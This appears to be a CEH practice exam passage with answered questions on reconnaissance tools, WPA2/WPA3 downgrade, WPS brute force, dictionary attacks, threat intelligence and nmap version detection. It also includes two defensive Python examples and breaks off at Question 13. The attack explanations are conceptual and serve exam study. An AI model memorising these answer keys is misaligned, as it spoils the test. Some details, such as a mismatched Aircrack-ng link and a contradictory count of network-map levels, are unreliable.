CEH Practice Test 6

Question 1 of 65
Techniques such as password cracking or enumeration are far more efficient and faster when performed with a wordlist. There are many wordlists available on the Internet, and several come preinstalled in Kali or Parrot OS, but an attacker can also build a wordlist specifically for the target being attacked. This requires reconnaissance: gathering information about the victim, a process that many tools can automate. Which of the following tools can crawl a website and create a wordlist from it?
CeWL (https://tools.kali.org/password-attacks/cewl) is a Ruby application that spiders a given URL to a specified depth, optionally following external links, and returns a list of words that can then be fed to password crackers such as John the Ripper.

Incorrect answers:

Orbot (https://en.wikipedia.org/wiki/Orbot) is a free software proxy project that provides Internet anonymity for users of the Android operating system. It runs an instance of the Tor network on the device and routes traffic from the device's web browser, e-mail client, map program and other apps through the Tor network, providing anonymity for the user.

Shadowsocks (https://en.wikipedia.org/wiki/Shadowsocks) is a free and open-source encryption protocol project, widely used in China to circumvent Internet censorship.

Psiphon (https://en.wikipedia.org/wiki/Psiphon) is a free and open-source Internet censorship circumvention tool that combines secure communication and obfuscation technologies (VPN, SSH and HTTP proxy). Psiphon is a centrally managed and geographically diverse network of thousands of proxy servers, using a performance-oriented single- and multi-hop architecture.
Question 2 of 65
Identify the correct sequence of steps in the vulnerability-management life cycle.
According to EC-Council courseware, the correct order is as follows:

1. Identify assets and create a baseline. This phase identifies critical assets and prioritizes them to define risk based on the criticality and value of each system. This creates a good baseline for vulnerability management.
2. Vulnerability scan. This phase is crucial in vulnerability management: the security analyst performs a vulnerability scan of the network to identify known vulnerabilities in the organization's infrastructure.
3. Risk assessment. In this phase, the serious risks associated with the system are assessed and prioritized, and remediation is planned to eliminate the system flaws permanently. The risk assessment summarizes the vulnerability and risk level identified for each of the selected assets.
4. Remediation. Remediation is the process of applying fixes to vulnerable systems in order to reduce the impact and severity of vulnerabilities. This phase is initiated after the baseline and assessment steps have been completed.
5. Verification. In this phase, the security team re-scans the systems to assess whether the required remediation is complete and whether the individual fixes have been applied to the impacted assets.
6. Monitor. Organizations need to perform regular monitoring to maintain system security, using tools such as IDS/IPS and firewalls. Continuous monitoring identifies potential threats and any new vulnerabilities that have emerged.
Question 3 of 65
Ivan, a black-hat hacker, wants to gather information about the IoT cameras and devices used by the company he is attacking. For this purpose he uses a tool that collects information about the IoT devices connected to a network, their open ports and services, and the attack surface they expose. With this tool, Ivan continuously monitors every reachable server and device on the Internet, so that he can exploit these devices in the future. Which of the following tools did Ivan use to carry out this attack?
This is one more question where you must choose the tool from an abstract description of the situation. You will meet several similar questions on the exam; to answer them correctly, you only need to know which tool does what, without going into details.

Censys (https://censys.io/product/hnri/) provides an automated monitoring solution, integrated with your existing IT workflow, to scan your employees' home networks for exposures and vulnerabilities. The Censys HNRI ASM tool lets you map your workforce, alerts you when risks are detected, and lets you investigate changes over time. Censys HNRI looks for:
– exposed IoT and embedded devices, such as cameras and routers;
– exposed telnet, FTP and similar plaintext services found on many IoT devices and home routers, many with default credentials;
– remote desktop sharing, such as PCAnywhere and RDP;
– network management exposures, such as Intel AMT and SNMP;
– exposed Microsoft LAN protocols such as SMB, a popular vector for ransomware.

NeuVector (https://neuvector.com/) delivers full-lifecycle container security with a cloud-native Kubernetes security platform providing end-to-end vulnerability management, automated CI/CD pipeline security, and complete run-time security, including what it describes as the industry's only container firewall, to protect your infrastructure from zero-days and insider threats.

Lacework (https://www.lacework.com/) is a data-driven security platform for the cloud. The Lacework Cloud Security Platform, powered by Polygraph, automates cloud security at scale so that customers can innovate with speed and safety.

Wapiti (https://wapiti.sourceforge.io/) lets you audit the security of your websites or web applications. It performs "black-box" scans (it does not study the source code) by crawling the pages of the deployed web application, looking for scripts and forms where it can inject data.
Question 4 of 65
Evil hacker Ivan knows that his target access point and the user's client both support the WPA2 and WPA3 encryption mechanisms. He decides to install a rogue access point with only WPA2 compatibility in the vicinity and force the victim to go through the WPA2 four-way handshake to connect. As soon as the connection is established, Ivan plans to use automated tools to crack the WPA2-encrypted messages. Which of the following attacks does Ivan want to perform?
Downgrade security attack (https://www.welivesecurity.com/2019/04/11/wpa3-flaws-steal-wifi-passwords/). To launch this attack, the client and the AP must support both the WPA3 and WPA2 encryption mechanisms. The attacker forces the user to fall back to the older encryption method, WPA2, to connect to the network. A downgrade security attack can be implemented in two ways.
– Exploiting backward compatibility: if a user and an AP are compatible with both WPA2 and WPA3, the attacker installs a rogue AP with only WPA2 compatibility in the vicinity and forces the client to go through the WPA2 four-way handshake to get connected. Once the connection is established, the attacker uses the available attack tools to exploit or crack the WPA2 encryption.
– Exploiting the Dragonfly handshake: in this method, the attacker masquerades as an authentic AP. When a user attempts to exchange keys using the WPA3 authentication mechanism, the attacker informs the user that it does not support WPA3 and suggests a weaker mechanism such as WPA2 instead. The attacker can then use various techniques to exploit or crack the WPA2 encryption.

Incorrect answers:

Side-channel attack (https://en.wikipedia.org/wiki/Side-channel_attack). A side-channel attack is any attack based on information gained from the implementation of a computer system, rather than on weaknesses in the implemented algorithm itself (as exploited by cryptanalysis and software bugs). Timing information, power consumption, electromagnetic leaks or even sound can provide an extra source of information that can be exploited. Some side-channel attacks require technical knowledge of the internal operation of the system, although others, such as differential power analysis, are effective as black-box attacks. The rise of Web 2.0 applications and software-as-a-service has also significantly raised the possibility of side-channel attacks on the web, even when transmissions between a web browser and a server are encrypted (e.g. through HTTPS or Wi-Fi encryption), according to researchers from Microsoft Research and Indiana University. Many powerful side-channel attacks are based on statistical methods pioneered by Paul Kocher. Attempts to break a cryptosystem by deceiving or coercing people with legitimate access are not typically considered side-channel attacks; see social engineering and rubber-hose cryptanalysis.

General classes of side-channel attack include:
– Cache attack: based on the attacker's ability to monitor cache accesses made by the victim in a shared physical system, as in a virtualized environment or a type of cloud service.
– Timing attack: based on measuring how much time various computations take (such as comparing an attacker-supplied password with the victim's unknown one).
– Power-monitoring attack: makes use of varying power consumption by the hardware during computation.
– Electromagnetic attack: based on leaked electromagnetic radiation, which can directly provide plaintexts and other information. Such measurements can be used to infer cryptographic keys with techniques equivalent to those of power analysis, or in non-cryptographic attacks such as TEMPEST (also known as van Eck phreaking or radiation monitoring).
– Acoustic cryptanalysis: exploits sound produced during a computation (rather like power analysis).
– Differential fault analysis: secrets are discovered by introducing faults into a computation.
– Data remanence: sensitive data are read after supposedly having been deleted (e.g. the cold boot attack).
– Software-initiated fault attacks: currently a rare class of side channels; Row hammer is an example, in which off-limits memory can be changed by accessing adjacent memory too often (causing loss of state retention).
– Optical: secrets and sensitive data are read by visual recording with a high-resolution camera or other devices with such capabilities.
Question 5 of 65
WPS is a rather troubled wireless network security standard. While it can make your life easier, it is also vulnerable to attack. An attacker within radio range can brute-force the WPS PIN of a vulnerable access point, obtain the WEP or WPA password, and thereby gain access to the Wi-Fi network. First, however, the attacker needs to find a vulnerable access point. Which of the following tools can identify WPS-enabled access points?
Wi-Fi Protected Setup (https://ru.wikipedia.org/wiki/Wi-Fi_Protected_Setup) is a computing standard created by the Wi-Fi Alliance to ease the setup and securing of a wireless home network. WPS contains an authentication method called "external registrar" that only requires the router's PIN. The WPS PIN is susceptible to a brute-force attack: a design flaw in the WPS specification for PIN authentication significantly reduces the time required to brute-force the entire PIN, because it lets an attacker learn when the first half of the eight-digit PIN is correct. The lack of a proper lock-out policy after a certain number of failed PIN attempts on many wireless routers makes this brute-force attack that much more feasible. Once on the network, the attacker can monitor traffic and mount further attacks.

Wash (https://en.kali.tools/?p=341) is a utility for identifying WPS-enabled access points. It can survey from a live interface or scan a list of pcap files. It is an auxiliary tool designed to display WPS-enabled access points and their main characteristics.

Incorrect answers:

net view (https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875576(v=ws.11)) displays a list of domains, computers, or resources being shared by the specified computer. Used without parameters, net view displays a list of computers in your current domain.

macof (https://linux.die.net/man/8/macof) floods the local network with random MAC addresses (causing some switches to fail open in repeating mode, facilitating sniffing).

ntptrace (https://www.ibm.com/docs/en/aix/7.2?topic=n-ntptrace-command) traces a chain of Network Time Protocol (NTP) hosts back to their master time source.
Question 6 of 65
6. Question
Your boss has instructed you to introduce a hybrid encryption software program into a web application to secure email messages. You are planning to use free software that uses both symmetric-key cryptography and asymmetric-key cryptography for improved speed and secure key exchange. Which of the following meets these requirements?
Correct
GPG https://en.wikipedia.org/wiki/GNU_Privacy_Guard GnuPG is a complete and free implementation of the OpenPGP standard as defined by RFC 4880 (also known as PGP). GnuPG allows you to encrypt and sign your data and communications; it features a versatile key management system, along with access modules for all kinds of public key directories. GnuPG, also known as GPG, is a command-line tool with features for easy integration with other applications. A wealth of frontend applications and libraries are available. GnuPG also provides support for S/MIME and Secure Shell (ssh). GnuPG is a hybrid-encryption software program because it uses a combination of conventional symmetric-key cryptography for speed, and public-key cryptography for ease of secure key exchange, typically by using the recipient's public key to encrypt a session key which is used only once. This mode of operation is part of the OpenPGP standard and has been part of PGP from its first version.

Incorrect answers:
SMTP https://en.wikipedia.org/wiki/Simple_Mail_Transfer_Protocol The Simple Mail Transfer Protocol (SMTP) is an internet standard communication protocol for electronic mail transmission. Mail servers and other message transfer agents use SMTP to send and receive mail messages. User-level email clients typically use SMTP only for sending messages to a mail server for relaying, and typically submit an outgoing email to the mail server on port 587 or 465 per RFC 8314. For retrieving messages, IMAP (which replaced the older POP3) is standard, but proprietary servers also often implement proprietary protocols, e.g., Exchange ActiveSync.
PGP https://en.wikipedia.org/wiki/Pretty_Good_Privacy NOTE: Incorrect because PGP is a proprietary solution owned by Symantec, but the question asked about "free software." Pretty Good Privacy (PGP) is an encryption program that provides cryptographic privacy and authentication for data communication. PGP is used for signing, encrypting, and decrypting texts, e-mails, files, directories, and whole disk partitions and to increase the security of e-mail communications. PGP and similar software follow the OpenPGP standard (RFC 4880), an open standard for PGP encryption software, for encrypting and decrypting data. PGP encryption uses a serial combination of hashing, data compression, symmetric-key cryptography, and finally public-key cryptography; each step uses one of several supported algorithms. Each public key is bound to a username or an e-mail address. The first version of this system was generally known as a web of trust, in contrast to the X.509 system, which uses a hierarchical approach based on certificate authorities and which was added to PGP implementations later. Current versions of PGP encryption include options through an automated key management server.
S/MIME https://en.wikipedia.org/wiki/S/MIME S/MIME (Secure/Multipurpose Internet Mail Extensions) is a standard for public key encryption and signing of MIME data. S/MIME is on an IETF standards track and defined in a number of documents, most importantly RFC 3369, 3370, 3850 and 3851. It was originally developed by RSA Data Security and the original specification used the IETF MIME specification with the de facto industry standard PKCS#7 secure message format. Change control to S/MIME has since been vested in the IETF and the specification is now layered on Cryptographic Message Syntax (CMS), an IETF specification that is identical in most respects with PKCS #7. S/MIME functionality is built into the majority of modern email software and interoperates between them. Since it is built on CMS, MIME can also hold an advanced digital signature.
Question 7 of 65
7. Question
You need to protect the company's network from imminent threats. To complete this task, you will enter information about threats into the security devices in a digital format to block and identify inbound and outbound malicious traffic entering the company's network. Which of the following types of threat intelligence will you use?
Correct
https://info-savvy.com/types-of-threat-intelligence/ Technical threat intelligence. With technical cyber intelligence, information about the attackers' resources, such as command and control channels and tools, is collected. For example, it focuses on phishing emails or technical tips that indicate a cybersecurity threat, such as fraudulent URLs. The aim is to collect information about specific IOCs (IP address, phishing email header, hash checksum). This type of threat intelligence is important because it allows attacks to be analyzed. However, the value of technical threat intelligence is short-lived, as hackers often change their tactics. IOCs that are detected and analyzed at the right time are important. Tactical intelligence is used by employees in the SOC team. Thanks to the information obtained here, new rules are written in the current security products of the organization (such as IDS/IPS, firewall, endpoint security system). Also, suspicious IPs are detected from spam emails. The information obtained here feeds the products of the organization directly.

Incorrect answers:
Strategic threat intelligence: Strategic threat intelligence provides high-level information on the cybersecurity posture, threats, financial impact of cyber activities, attack trends, and their impact on business decisions. The information obtained can be used by senior executives at the company. The purpose of strategic threat intelligence is to manage existing cyber risks and unknown future risks. This intelligence offers a risk-based approach. It focuses on the effects and likelihood of risks. The information provided here is suitable for long-term use. It helps in making strategic business decisions. For example, it can inform decisions on the budget/employee/product balance in protecting critical assets. Data collection sources for strategic intelligence are also high-level sources: OSINT, CTI vendors, and ISAOs/ISACs.
Operational threat intelligence: Operational threat intelligence provides information to the managers of the defense teams about specific threats to the company. People such as the head of network defenders, the fraud detection manager and the incident response team manager need to understand the attack's effect. With incoming intelligence, an attempt is made to identify the threat actor and to determine his capabilities and the threatened IT assets. In operational threat intelligence, information is collected through hacker forums, chat rooms, social media, and current cyber attacks. The attack that may follow is estimated from the collected information, and protection planning is issued.
Tactical threat intelligence: Tactical threat intelligence provides detailed information on the tactics, techniques, and procedures of threat actors. It is predominantly for a technical audience and helps them to understand how their networks are attacked based on the latest methods attackers used to achieve their goals. It provides information that can be consumed by security experts such as IT managers, SOC managers, and NOC managers. These employees use tactical cyber intelligence to understand the technical capability and objectives of the attackers and to identify their detection and mitigation strategies. Tactical cyber intelligence is collected through malware and incident reports, attack group reports, human intelligence, and campaign reports.
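The technical-intelligence explanation above describes turning IOCs (IP addresses, hashes, mail headers) into rules that feed the organization's security products directly, and notes that such indicators are short-lived. The block below is an added example, not code from the practice test, from EC-Council, or from the info-savvy article it cites: a small matcher that applies an IOC feed to log lines and drops indicators past their expiry date. The indicator values, the log lines and the key=value log layout are all constructed for illustration and are not real IOCs.

```python
"""
Added example (not from the practice test or the article it cites): apply a
feed of technical threat intelligence (IOCs) to log lines, honouring each
indicator's expiry so that stale intelligence stops firing.

All indicator values, log lines and the key=value layout are constructed.
"""
import hashlib
import re
from datetime import date

# Hash of a constructed byte string, standing in for a file-hash indicator.
DROPPER_SHA256 = hashlib.sha256(b"constructed-sample-dropper").hexdigest()

# Constructed IOC feed. Each entry carries valid_until because the page notes
# that technical threat intelligence is short-lived; expired entries are
# ignored rather than left to generate noise indefinitely.
IOC_FEED = [
    {"type": "ip", "value": "203.0.113.45", "valid_until": "2024-09-01", "source": "feed-A"},
    {"type": "domain", "value": "Update-Check.example", "valid_until": "2024-09-01", "source": "feed-A"},
    {"type": "sha256", "value": DROPPER_SHA256, "valid_until": "2024-09-01", "source": "feed-B"},
    {"type": "ip", "value": "198.51.100.7", "valid_until": "2023-01-01", "source": "feed-C"},  # expired
]

# Constructed log lines in a hypothetical key=value layout.
SAMPLE_LOGS = [
    "ts=2024-04-02T10:00:01Z src=10.0.0.5 dst=203.0.113.45 dport=443 action=allow",
    "ts=2024-04-02T10:00:02Z src=10.0.0.6 host=update-check.example uri=/a.php action=allow",
    "ts=2024-04-02T10:00:03Z src=10.0.0.7 dst=198.51.100.7 dport=80 action=allow",
    "ts=2024-04-02T10:00:04Z src=10.0.0.8 dst=192.0.2.10 dport=443 action=allow",
    "ts=2024-04-02T10:00:05Z src=10.0.0.9 file=setup.exe sha256=" + DROPPER_SHA256 + " action=exec",
]

KV_RE = re.compile(r"(\w+)=(\S+)")

# Which log field is compared against which indicator type.
FIELD_TYPES = {"src": "ip", "dst": "ip", "host": "domain", "sha256": "sha256"}


def parse_line(line):
    """Split a key=value log line into a dict of field -> value."""
    return dict(KV_RE.findall(line))


def active_indicators(feed, today):
    """Index the feed by type and lower-cased value, dropping expired entries.

    `today` is an ISO date string such as "2024-04-02".
    """
    today = date.fromisoformat(today)
    index = {}
    for ioc in feed:
        if date.fromisoformat(ioc["valid_until"]) < today:
            continue  # stale indicator: do not alert on it
        index.setdefault(ioc["type"], {})[ioc["value"].lower()] = ioc
    return index


def match_logs(lines, feed, today):
    """Return one hit per (line, field) whose value equals an active indicator."""
    index = active_indicators(feed, today)
    hits = []
    for line in lines:
        fields = parse_line(line)
        for field, ioc_type in FIELD_TYPES.items():
            value = fields.get(field, "").lower()
            ioc = index.get(ioc_type, {}).get(value)
            if ioc is not None:
                hits.append({
                    "ts": fields.get("ts"),
                    "field": field,
                    "indicator": ioc["value"],
                    "source": ioc["source"],
                })
    return hits


if __name__ == "__main__":
    # Three of the five constructed lines hit; the expired IP does not.
    for hit in match_logs(SAMPLE_LOGS, IOC_FEED, "2024-04-02"):
        print(hit)
```

Run against the constructed logs on 2024-04-02, the matcher reports the destination IP, the domain (matched case-insensitively) and the file hash, and stays silent on 198.51.100.7 because that indicator expired in 2023. Every hit carries its feed source, which is what an analyst needs when deciding whether an old indicator should be renewed or retired.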
Question 8 of 65
8. Question
Which of the following is a Kubernetes component that can assign nodes based on the overall resource requirement, data locality, software/hardware/policy restrictions, and internal workload interventions?
Correct
According to EC-Council courseware:
Kube-scheduler: Kube-scheduler is a master component that scans newly generated pods and allocates a node for them. It assigns the nodes based on factors such as the overall resource requirement, data locality, software/hardware/policy restrictions, and internal workload interventions.
Kube-apiserver: The API server is an integral part of the Kubernetes control panel that responds to all API requests. It serves as a front-end utility for the control panel and it is the only component that interacts with the etcd cluster and ensures data storage.
Kube-controller-manager: Kube-controller-manager is a master component that runs controllers. Controllers are generally individual processes (e.g., node controller, endpoint controller, replication controller, service account and token controller) but are combined into a single binary and run together in a single process to reduce complexity.
cloud-controller-manager: This is the master component used to run controllers that communicate with cloud providers. Cloud-controller-manager enables the Kubernetes code and cloud provider code to evolve separately.
Question 9 of 65
9. Question
Ivan, a black hat hacker, got the username from the target environment. In conditions of limited time, he decides to use a list of common passwords, which he will pass as an argument to the hacking tool. Which of the following is the method of attack that Ivan uses?
Correct
https://en.wikipedia.org/wiki/Dictionary_attack A dictionary attack is a form of brute force attack technique for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase by trying thousands or millions of likely possibilities, such as words in a dictionary or previously used passwords, often from lists obtained from past security breaches. A dictionary attack is based on trying all the strings in a pre-arranged listing. Such attacks originally used words found in a dictionary (hence the phrase dictionary attack); however, now there are much larger lists available on the open Internet containing hundreds of millions of passwords recovered from past data breaches. There is also cracking software that can use such lists and produce common variations, such as substituting numbers for similar-looking letters. A dictionary attack tries only those possibilities which are deemed most likely to succeed. Dictionary attacks often succeed because many people have a tendency to choose short passwords that are ordinary words or common passwords, or variants obtained, for example, by appending a digit or punctuation character. Dictionary attacks are often successful since many commonly used password creation techniques are covered by the available lists, combined with cracking software pattern generation. A safer approach is to randomly generate a long password (15 letters or more) or a multiword passphrase, using a password manager program or manually typing a password.

Below you will find several tools that can use this type of attack:
John the Ripper: https://en.wikipedia.org/wiki/John_the_Ripper
Aircrack-ng: https://ophcrack.sourceforge.io/
Hashcat: https://en.wikipedia.org/wiki/Hashcat

Incorrect answers:
Known plaintext attack https://en.wikipedia.org/wiki/Known-plaintext_attack The known-plaintext attack (KPA) is a type of cryptanalysis in which standard pieces are present in the ciphertext, the meaning of which is known to the analyst in advance. During the Second World War, English cryptanalysts called such pieces "hints".
Smudge attack https://en.wikipedia.org/wiki/Smudge_attack A smudge attack is an information extraction attack that discerns the password input of a touchscreen device such as a cell phone or tablet computer from fingerprint smudges. A team of researchers at the University of Pennsylvania was the first to investigate this type of attack in 2010. An attack occurs when an unauthorized user is in possession of or is near the device of interest. The attacker relies on detecting the oily smudges produced and left behind by the user's fingers to find the pattern or code needed to access the device and its contents. Simple cameras, lights, fingerprint powder, and image processing software can be used to capture the fingerprint deposits created when the user unlocks their device. Under proper lighting and camera settings, the finger smudges can be easily detected, and the heaviest smudges can be used to infer the most frequent input swipes or taps from the user.
Password spraying attack Password spraying is a type of brute force attack. In this attack, an attacker will brute force logins based on a list of usernames with default passwords on the application. For example, an attacker will use one password (say, Secure@123) against many different accounts on the application to avoid the account lockouts that would normally occur when brute forcing a single account with many passwords.
Question 10 of 65
10. Question
Assume you used Nmap, and after applying a command, you got the following output:
Starting Nmap X.XX (http://nmap.org) at XXX-XX-XX XX:XX EDT
Nmap scan report for 192.168.1.42
Host is up (0.00023s latency).
Not shown: 932 filtered ports, 56 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
143/tcp open imap
443/tcp open https
465/tcp open smtps
587/tcp open submission
993/tcp open imaps
995/tcp open pop3s
Nmap done: 1 IP address (1 host up) scanned in 3.90 seconds
Which of the following command-line parameters could you use to determine the service protocol, the application name, the version number, the hostname and the device type?
Correct
https://nmap.org/book/man-version-detection.html
Point Nmap at a remote machine and it might tell you that ports 25/tcp, 80/tcp, and 53/udp are open. Using its nmap-services database of about 2,200 well-known services, Nmap would report that those ports probably correspond to a mail server (SMTP), web server (HTTP), and name server (DNS) respectively. This lookup is usually accurate: the vast majority of daemons listening on TCP port 25 are, in fact, mail servers. However, you should not bet your security on this! People can and do run services on strange ports. Even if Nmap is right, and the hypothetical server above is running SMTP, HTTP, and DNS servers, that is not a lot of information. When doing vulnerability assessments (or even simple network inventories) of your company or clients, you really want to know which mail and DNS servers and versions are running. Having an accurate version number helps dramatically in determining which exploits a server is vulnerable to. Version detection helps you obtain this information.
After TCP and/or UDP ports are discovered using one of the other scan methods, version detection interrogates those ports to determine more about what is actually running. The nmap-service-probes database contains probes for querying various services and match expressions to recognize and parse responses. Nmap tries to determine the service protocol (e.g. FTP, SSH, Telnet, HTTP), the application name (e.g. ISC BIND, Apache httpd, Solaris telnetd), the version number, hostname, device type (e.g. printer, router), and the OS family (e.g. Windows, Linux). When possible, Nmap also gets the Common Platform Enumeration (CPE) representation of this information. Sometimes miscellaneous details like whether an X server is open to connections, the SSH protocol version, or the KaZaA user name, are available. Of course, most services don't provide all of this information.
If Nmap was compiled with OpenSSL support, it will connect to SSL servers to deduce the service listening behind that encryption layer. Some UDP ports are left in the open|filtered state after a UDP port scan is unable to determine whether the port is open or filtered. Version detection will try to elicit a response from these ports (just as it does with open ports), and change the state to open if it succeeds. open|filtered TCP ports are treated the same way. Note that the Nmap -A option enables version detection among other things.
When RPC services are discovered, the Nmap RPC grinder is automatically used to determine the RPC program and version numbers. It takes all the TCP/UDP ports detected as RPC and floods them with SunRPC program NULL commands in an attempt to determine whether they are RPC ports, and if so, what program and version number they serve up. Thus you can effectively obtain the same info as rpcinfo -p even if the target's portmapper is behind a firewall (or protected by TCP wrappers). Decoys do not currently work with RPC scan.
When Nmap receives responses from a service but cannot match them to its database, it prints out a special fingerprint and a URL for you to submit it to if you know for sure what is running on the port. Please take a couple of minutes to make the submission so that your find can benefit everyone. Thanks to these submissions, Nmap has about 6,500 pattern matches for more than 650 protocols such as SMTP, FTP, HTTP, etc.
-sV (Version detection): Enables version detection, as discussed above. Alternatively, you can use -A, which enables version detection among other things.
Incorrect answers:
-sS (TCP SYN scan): SYN scan is the default and most popular scan option for good reasons. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls. It is also relatively unobtrusive and stealthy since it never completes TCP connections. SYN scan works against any compliant TCP stack rather than depending on idiosyncrasies of specific platforms as Nmap's FIN/NULL/Xmas, Maimon and idle scans do. It also allows clear, reliable differentiation between the open, closed, and filtered states.
-sT (TCP connect scan): TCP connect scan is the default TCP scan type when SYN scan is not an option. This is the case when a user does not have raw packet privileges. Instead of writing raw packets as most other scan types do, Nmap asks the underlying operating system to establish a connection with the target machine and port by issuing the connect system call. This is the same high-level system call that web browsers, P2P clients, and most other network-enabled applications use to establish a connection. It is part of a programming interface known as the Berkeley Sockets API. Rather than read raw packet responses off the wire, Nmap uses this API to obtain status information on each connection attempt.
-sY (SCTP INIT scan): SCTP is a relatively new alternative to the TCP and UDP protocols, combining most characteristics of TCP and UDP, and also adding new features like multi-homing and multi-streaming. It is mostly being used for SS7/SIGTRAN related services but has the potential to be used for other applications as well. SCTP INIT scan is the SCTP equivalent of a TCP SYN scan. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls. Like SYN scan, INIT scan is relatively unobtrusive and stealthy, since it never completes SCTP associations. It also allows clear, reliable differentiation between the open, closed, and filtered states.
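As an added example (not Nmap project code and not part of the original test), the Python parser below reads Nmap normal output like the one in the question and reports which open ports still carry only the nmap-services port-number guess, so the reader can see concretely what -sV changes. Both scan outputs and every version string in them are constructed; the trailing "?" convention follows Nmap's documented output for services it could not confirm.

```python
"""Parse Nmap normal output and separate ports whose SERVICE name was
actually elicited from the daemon (version detection, -sV) from ports whose
name is only the nmap-services port-number lookup.

Added example for this practice test, not Nmap project code. Both scan
outputs are constructed: the first mirrors the question, the second
imitates the VERSION column that -sV adds, with invented version strings.
"""
import re

# Constructed: scan without -sV, so SERVICE is purely a port-table guess.
SCAN_NO_SV = """\
Starting Nmap X.XX (http://nmap.org) at XXX-XX-XX XX:XX EDT
Nmap scan report for 192.168.1.42
Host is up (0.00023s latency).
Not shown: 932 filtered ports, 56 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https
Nmap done: 1 IP address (1 host up) scanned in 3.90 seconds
"""

# Constructed: the same host with -sV (and -sU for the UDP port). Nmap
# prints a '?' after SERVICE when no probe matched and the name is still
# the port-table guess; an open|filtered port is one that answered nothing.
SCAN_SV = """\
Nmap scan report for 192.168.1.42
Host is up (0.00023s latency).
PORT     STATE         SERVICE    VERSION
21/tcp   open          ftp        vsftpd 3.0.3
22/tcp   open          ssh        OpenSSH 8.2p1 (protocol 2.0)
80/tcp   open          http       Apache httpd 2.4.41
443/tcp  open          ssl/http   Apache httpd 2.4.41
8080/tcp open          http-proxy?
161/udp  open|filtered snmp
Service Info: OS: Linux
"""

PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp|sctp)\s+(?P<state>\S+)\s+"
    r"(?P<service>\S+)(?:\s+(?P<version>.+))?$"
)


def parse_nmap_output(text):
    """Return one dict per port line.

    'version' is None when there is no VERSION column (no -sV) or when -sV
    probed the port but matched nothing. 'guessed' is True when SERVICE is
    only the nmap-services lookup: always without -sV, and with -sV when
    Nmap appended '?' to the name.
    """
    records, has_version_col = [], False
    for line in text.splitlines():
        if line.startswith("PORT "):
            has_version_col = "VERSION" in line.split()
            continue
        m = PORT_RE.match(line)
        if not m:
            continue
        service = m["service"]
        records.append({
            "port": int(m["port"]),
            "proto": m["proto"],
            "state": m["state"],
            "service": service.rstrip("?"),
            "version": (m["version"] or "").strip() or None,
            "guessed": not has_version_col or service.endswith("?"),
        })
    return records


def unverified_ports(records):
    """Ports where nothing has been confirmed from the daemon itself: the
    name is a port-number guess, or the state stayed open|filtered because
    version detection got no response. These are the ports to re-probe
    before trusting the service name in an inventory or vulnerability match."""
    return [(r["port"], r["proto"]) for r in records
            if r["guessed"] or r["state"] == "open|filtered"]


if __name__ == "__main__":
    for name, scan in (("without -sV", SCAN_NO_SV), ("with -sV", SCAN_SV)):
        print(name, "->", unverified_ports(parse_nmap_output(scan)))
```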
Question 11 of 65
11. Question
The boss has instructed you to test the company's network from the attacker's point of view to find out what exploits and vulnerabilities are accessible to the outside world through devices such as firewalls, routers, and servers. This assessment should also estimate the threat of network security attacks external to the organization. What type of vulnerability assessment should you perform?
Correct
https://info-savvy.com/top-8-most-useful-vulnerability-assessments/
External Assessments
An external assessment assesses the network from a hacker's point of view to find out what exploits and vulnerabilities are accessible to the outside world. These types of assessments use external devices like firewalls, routers, and servers. An external assessment estimates the threat of network security attacks external to the organization. It determines how secure the external network and firewall are.
Incorrect answers:
Host-based Assessments
Host-based assessments are a type of security check that involves carrying out a configuration-level check through the command line. These assessments check the security of a particular network or server. Host-based scanners assess systems to identify vulnerabilities such as incorrect registry and file permissions, as well as software configuration errors. Host-based assessment can use many commercial and open-source scanning tools.
Passive Assessments
Passive assessments sniff the traffic present on the network to identify the active systems, network services, applications, and vulnerabilities. Passive assessments also provide a list of the users who have recently used the network.
Active Assessments
Active assessment is a type of vulnerability assessment that uses network scanners to scan the network to identify the hosts, services, and vulnerabilities present in that network. These network scanners have the capability to reduce the intrusiveness of the checks they perform.
Question 12 of 65
12. Question
The attacker wants to draw a map of the target organization's network infrastructure to learn about the actual environment they will attack. Which of the following will allow them to do this?
Correct
https://en.wikipedia.org/wiki/Network_mapping
https://w4rri0r.com/hacking-tools-windows-os-x-linux-android-solaris-unixware/network-mapping.html
It would be much more logical to use the phrase "Network mapper," but you can meet a question on this topic with exactly this wording on the exam.
The network map provides a topology view of your network to help you visualize network partitions, dependencies, and bottlenecks. Network mapping is the process of visualizing all the devices on a network, how they're connected, and how the overall network is structured. There are two main levels of maps to consider: physical and logical. While open-source network mapping tools can create a physical network map, they may not offer automated scanning to ensure the map is always up to date. There are three levels of maps to consider: physical, logical, and functional. A physical network map diagrams all the actual components of your network, including cords, plugs, racks, ports, servers, cables, and more. A physical network map gives you a visual representation of all the material elements of your network and the connections between them. A logical map is more abstract than the physical network map. It shows the type of network topology (bus, ring, etc.), and how the data flows between the physical objects in your network. This includes IP addresses, firewalls, routers, subnets and subnet masks, traffic flow, voice gateways, and other segments of the network. To note: since logical and physical network maps depict the same network environment from two different perspectives, it's best to use both types to get a more comprehensive look at your network. A functional network map shows you how application traffic flows through the network physically. These types of network maps are only as useful as they are accurate, which means you need an appropriate and high-quality tool.
Incorrect answers:
Vulnerability Analysis
A vulnerability analysis is a review that focuses on security-relevant issues that either moderately or severely impact the security of the product or system.
Malware analysis
https://en.wikipedia.org/wiki/Malware_analysis
Malware analysis is the study or process of determining the functionality, origin and potential impact of a given malware sample such as a virus, worm, trojan horse, rootkit, or backdoor. Malware, or malicious software, is any computer software intended to harm the host operating system or to steal sensitive data from users, organizations or companies. Malware may include software that gathers user information without permission.
Network enumeration
https://en.wikipedia.org/wiki/Network_enumeration
Network enumeration is a computing activity in which usernames and info on groups, shares, and services of networked computers are retrieved. It should not be confused with network mapping, which only retrieves information about which servers are connected to a specific network and what operating system runs on them. Network enumeration is the discovery of hosts or devices on a network. Network enumeration tends to use overt discovery protocols such as ICMP and SNMP to gather information. It may also scan various ports on remote hosts looking for well-known services in an attempt to further identify the function of a remote host. The next stage of enumeration is to fingerprint the operating system of the remote host.
Question 13 of 65
13. Question
